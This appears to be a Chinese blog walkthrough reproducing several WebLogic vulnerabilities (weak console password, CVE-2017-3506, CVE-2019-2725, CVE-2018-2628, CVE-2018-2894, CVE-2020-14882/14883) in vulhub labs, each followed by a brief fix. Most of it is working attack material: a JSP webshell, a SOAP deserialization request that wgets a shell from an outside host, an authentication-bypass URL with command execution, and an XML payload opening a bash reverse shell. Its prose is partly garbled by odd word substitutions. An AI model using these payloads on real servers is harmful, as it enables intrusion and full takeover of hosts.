WebLogic毛病复现（附带修复方法）

       WebLogic是美国Oracle公司出品的一个application server，确切的说是一个基于JAVAEE架构的中间件，默认端口:7001WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise尺度的安全性引入大型网络应用的开发、集成、部署和管理之中。
2.1后台弱口令GetShell

通过弱口令进入后台界面，上传部署war包，getshell
毛病复现

首先搭建环境，命令如下

1. cd vulhub-master/weblogic/weak_password
2. docker-compose up -d

复制代码

然后访问目标的/console/login/LoginForm.jsp 目录进入一个登岸界面，这里的默认账号暗码是：weblogic/Oracle@123，我们直接登录

如果出现如下页面，点击主页即可成功登录

然后在主页中点击部署里的安装，然后就可以上传文件了

我们直接上传一个之前制作的war包，jsp木马压缩成zip，修改后缀为war，上传

上传完成后访问我们名为1的war包下的1.jsp文件，成功访问

然后用蚁剑连接

   毛病修复

  修改暗码为复杂暗码
  2.2 CVE-2017-3506反序列化毛病

      Weblogic的WLS Security组件对外提供了webserver服务，其中利用了XMLDecoder来解析用户输入的XML数据，在解析过程中出现反序列化毛病，可导致恣意命令执行。
毛病复现

搭建环境命令如下，与2.1中用的环境雷同

1. cd vulhub-master/weblogic/weak_password
2. docker-compose up -d

复制代码

访问以下目录中的一种，如果有回显如下图，则可以判定wls-wsat组件存在
   /wls-wsat/CoordinatorPortType
  /wls-wsat/RegistrationPortTypeRPC
  /wls-wsat/ParticipantPortType
  /wls-wsat/RegistrationRequesterPortType
  /wls-wsat/CoordinatorPortType11
  /wls-wsat/RegistrationPortTypeRPC11
  /wls-wsat/ParticipantPortType11
  /wls-wsat/RegistrationRequesterPortType11
  

然后这里可以利用抓包然后添加请求包，在标签之间分别写存放 jsp 的路径和要写入的 shell来获取shell，也可以直接利用工具，我这里利用工具，在地点中填写目标url然后点击查抄即可检测毛病

此处检测出有毛病后，点击文件上传，将我们之前搜到的jsp一句话木马复制粘贴上去，然后点击上传文件
一句话木马如下

1. <%!
2.     class U extends ClassLoader {
3.         U(ClassLoader c) {
4.             super(c);
5.         }
6.         public Class g(byte[] b) {
7.             return super.defineClass(b, 0, b.length);
8.         }
9.     }
11.     public byte[] base64Decode(String str) throws Exception {
12.         try {
13.             Class clazz = Class.forName("sun.misc.BASE64Decoder");
14.             return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
15.         } catch (Exception e) {
16.             Class clazz = Class.forName("java.util.Base64");
17.             Object decoder = clazz.getMethod("getDecoder").invoke(null);
18.             return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
19.         }
20.     }
21. %>
22. <%
23.     String cls = request.getParameter("passwd");
24.     if (cls != null) {
25.         new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
26.     }
27. %>

复制代码

显示上传完成后，在工具下方会显示上传文件的路径，我们直接去访问

发现成功访问后用蚁剑连接

   毛病修复

  更新到最新版本，打上10271的补丁,对访问wls-wsat的资源举行访问控制 
  2.3 CVE-2019-2725

      wls9-async等组件为WebLogic Server提供异步通讯服务，默认应用于WebLogic部分版本。由于该WAR包在反序列化处理输入信息时存在缺陷，攻击者通过发送精心构造的恶意 HTTP 请求，即可得到目标服务器的权限，在未授权的情况下长途执行命令。
毛病复现

搭建环境命令如下（与前面一样）

1. cd vulhub-master/weblogic/weak_password
2. docker-compose up -d

复制代码

搭建完成后访问/_async/AsyncResponseService 目录，出现如下页面则访问成功，存在毛病

然后开启抓包，再次访问此页面，将抓到的数据包改为以下内容，其中第一个ip为我们所开环境的IP，第二个ip是公网ip，代码内容是，从公网ip中下载它的一个名为2.txt的文件，到我们环境的/bea_wls_internal/目录下，并确认名字为12121.jsp。修改完成后放包

1. POST /_async/AsyncResponseService HTTP/1.1
2. Host: ip:7001
3. Upgrade-Insecure-Requests: 1
4. User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
5. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
6. Accept-Encoding: gzip, deflate
7. Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
8. Connection: close
9. Content-Length: 838
10. Accept-Encoding: gzip, deflate
11. SOAPAction:
12. Accept: */*
13. User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
14. Connection: keep-alive
15. content-type: text/xml
17. <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing"
18. xmlns:asy="http://www.bea.com/async/AsyncResponseService">
19. <soapenv:Header>
20. <wsa:Action>xx</wsa:Action>
21. <wsa:RelatesTo>xx</wsa:RelatesTo>
22. <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
23. <void class="java.lang.ProcessBuilder">
24. <array class="java.lang.String" length="3">
25. <void index="0">
26. <string>/bin/bash</string>
27. </void>
28. <void index="1">
29. <string>-c</string>
30. </void>
31. <void index="2">
32. <string>wget http://ip2/2.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/12121.jsp
33. </string>
34. </void>
35. </array>
36. <void method="start"/></void>
37. </work:WorkContext>
38. </soapenv:Header><soapenv:Body>
39. <asy:onAsyncDelivery/>
40. </soapenv:Body></soapenv:Envelope>

复制代码

我这里2.txt的内容是jsp的一句话木马，所以就相当与我们给他上传了一个一句话木马文件，然后去访问/bea_wls_internal/12121.jsp,发现访问成功

   毛病修复

  1. 禁⽤bea_wls9_async_response组件；
  2. 删除wls9_async_response的war包并重启 ；
  3. 禁⽌访问 /_async/* 路径。
  2.4 CVE-2018-2628

反序列化命令执⾏毛病
      Weblogic Server中的RMI 通信使⽤T3协议在Weblogic Server和其它Java程序（客户端大概其它 Weblogic Server实例）之间传输数据, 服务器实例会跟踪连接到应⽤程序的每个Java虚拟机（JVM）中, 并创建T3协议通信连接, 将流量传输到Java虚拟机. T3协议在开放WebLogic控制台端⼝的应⽤上默认开 启， 攻击者可以通过T3协议发送恶意的的反序列化数据, 进⾏反序列化, 实现对存在毛病的weblogic组件 的长途代码执⾏攻击。
毛病复现

搭建环境命令如下

1. cd vulhub-master/weblogic/CVE-2018-2628  
2. docker-compose up -d

复制代码

访问环境后是404，这次我们必要用到一个工具-liqun，这个工具在onefox工具箱中有
进入工具先选择weblogic，将目标ip填入url中然后点击验证

然后就可以执行命令并上传木马了

上传完成后他会直接将文件路径复制到粘贴板，直接去访问连接就可以

   毛病修复

  1. 实时更新补丁 ；
  2. 禁⽤T3协议 ；
  3. 禁⽌T3端⼝对外开放，大概限定可访问T3端⼝的IP泉源。
  4. 升级版本
  2.5 CVE-2018-2894

WebLogic⽂件恣意上传毛病
       Weblogic Web Service Test Page中⼀处恣意⽂件上传毛病，Web Service Test Page 在 "⽣产模式" 下默认不开启，所以该毛病有⼀定限定。
毛病复现

搭建环境命令如下

1. cd vulhub-master/weblogic/CVE-2018-2894  
2. docker-compose up -d

复制代码

搭建完成后在当前目录运行命令：docker-compose logs | grep password 查看暗码

然后访问/console/login/LoginForm.jsp 目录后登录

登岸后点击base_domain，然后点击高级

将启动web服务测试页选项勾选上，然后点击保存

保存后访问目标的/ws_utc/config.do目录，对config.do文件举行设置，将如下内容对其举行替换

1. /u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css

复制代码

点击提交后，点击左边的安全→添加，任意设置一个名字后上传一个1.jsp文件，内容为一句话木马

然后右键点击查抄选中id这一框，下面就会寻找到一个id值，这是一个时间戳

我们将时间戳与文件名拼接如下目录/ws_utc/css/config/keystore/1722931474218_1.jsp后访问

成功访问后用蚁剑连接

   毛病修复

  暗码改为强暗码
  2.6.CVE-2020-14882

WebLogic长途代码执⾏毛病
      CVE-2020-14882 允许长途⽤户绕过管理员控制台组件中的身份验证。 CVE-2020-14883 允许颠末身份验证的⽤户在管理员控制台组件上执⾏任何命令。 使⽤这两个毛病链，未经身份验证的长途攻击者可以通过 HTTP 在 Oracle WebLogic 服务器上执⾏任 意命令并完全控制主机
毛病复现

搭建环境

1. cd vulhub-master/weblogic/CVE-2020-14882
2. docker-compose up -d

复制代码

访问目标的/console/login/LoginForm.jsp目录进入管理控制台，必要登录，但是我们直接访问/console/css/%252e%252e%252fconsole.portal 就可以绕过登录认证直接进入

但是此时到达未授权得效果。还未能GetShell。可以利⽤第⼆个毛病（CVE-2020-14883），长途加载XML ⽂件拿到Shell
先访问/console/css/%252e%252e%252fconsole.portal? _nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runti me.getRuntime().exec('touch%20/tmp/success');")目录后，到docker的靶机控制台中查看，命令如下

1. docker ps
2. //查看靶机进程id
4. docker exec -it 容器id /bin/bash
5. //获得靶机shell
7. ls /tmp
8. 查看文件

复制代码

这里命令已经成功运⾏，有个success

这种利⽤⽅法只能在 Weblogic 12.2.1 及以上版本中使⽤，因为 10.3.6 没有 class
另一种方法

这里我们创建一个恶意的xml文件，将其提供到Weblogic可以访问得服务器上，内容如下

1. <?xml version="1.0" encoding="UTF-8" ?>
2. <beans xmlns="http://www.springframework.org/schema/beans"
3.    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
4.    xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
5.     <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
6.         <constructor-arg>
7.           <list>
8.             <value>bash</value>
9.             <value>-c</value>
10.             <value><![CDATA[bash -i >& /dev/tcp/ip/4444 0>&1]]></value>
11.           </list>
12.         </constructor-arg>
13.     </bean>
14. </beans>

复制代码

然后访问以下 URL，Weblogic 将加载此 XML 并执⾏其中的命令

1. http://ip:7001/console/css/%252e%252e%252fconsole.portal? _nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.File SystemXmlApplicationContext("http://ip:8000/rce.xml")

复制代码

然后成功反弹到shell

   毛病修复

  使weblogic访问不到外网

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。